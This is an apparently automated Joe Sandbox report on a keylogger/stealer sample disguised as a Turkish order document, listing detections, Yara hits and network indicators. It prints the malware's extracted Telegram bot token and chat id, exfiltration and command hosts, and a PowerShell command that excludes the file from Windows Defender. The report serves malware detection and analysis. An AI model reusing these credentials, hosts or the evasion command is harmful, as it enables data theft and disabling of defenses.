Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe

Overview

General Information

Sample name:fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 615TBI507_ ACCADO san tic_ Siparii jpeg docx .exe
Analysis ID:1586806
MD5:3e9b50da2409b41170a088fc4bb0e5f1
SHA1:7cbeabc06f45357344cdc6c876a1ecdb90b685da
SHA256:6964e678bccc61457b0d3f3ea6264d7c1e92d33802fffbb59f2f3c15f9dc5656
Tags:exeuser-lowmal3
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1444231240.0000000009CD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.1435443149.0000000004B73000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 16 entries
            SourceRuleDescriptionAuthorStrings
            0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 26 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 7472, ParentProcessName: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 7672, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 7472, ParentProcessName: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 7672, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 7472, ParentProcessName: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 7672, ProcessName: powershell.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeAvira: detected
                      Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                      Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                      Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                      Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 42%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeJoe Sandbox ML: detected

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeUnpacked PE file: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.ce0000.0.unpack
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630907951.00000000017E5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb4 source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.pdbMZ source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Xml.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.pdbTz source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp, WERA608.tmp.dmp.12.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.pdb" source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.ni.pdb source: WERA608.tmp.dmp.12.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERA608.tmp.dmp.12.dr
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 12900C93h0_2_12900239

                      Networking

                      barindex
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1434287481.000000000372C000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/

                      System Summary

                      barindex
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031407F4 NtQueryInformationProcess,0_2_031407F4
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03149C09 NtQueryInformationProcess,0_2_03149C09
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031483D90_2_031483D9
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03149A000_2_03149A00
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_0314A1300_2_0314A130
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031426B00_2_031426B0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031435900_2_03143590
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031414680_2_03141468
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031493370_2_03149337
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031493500_2_03149350
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031413C00_2_031413C0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03145AE00_2_03145AE0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_0314A1200_2_0314A120
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031499F00_2_031499F0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031458900_2_03145890
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031458800_2_03145880
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031408D00_2_031408D0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031456780_2_03145678
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031456880_2_03145688
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031486B00_2_031486B0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031486C00_2_031486C0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031435170_2_03143517
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03148D180_2_03148D18
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031444B90_2_031444B9
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03148CD40_2_03148CD4
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_03145CC00_2_03145CC0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_031444C80_2_031444C8
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F7C3500_2_09F7C350
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F779F00_2_09F779F0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F7C3AC0_2_09F7C3AC
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F7D5B10_2_09F7D5B1
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F756480_2_09F75648
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F7563F0_2_09F7563F
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F838E70_2_09F838E7
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F807300_2_09F80730
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F866480_2_09F86648
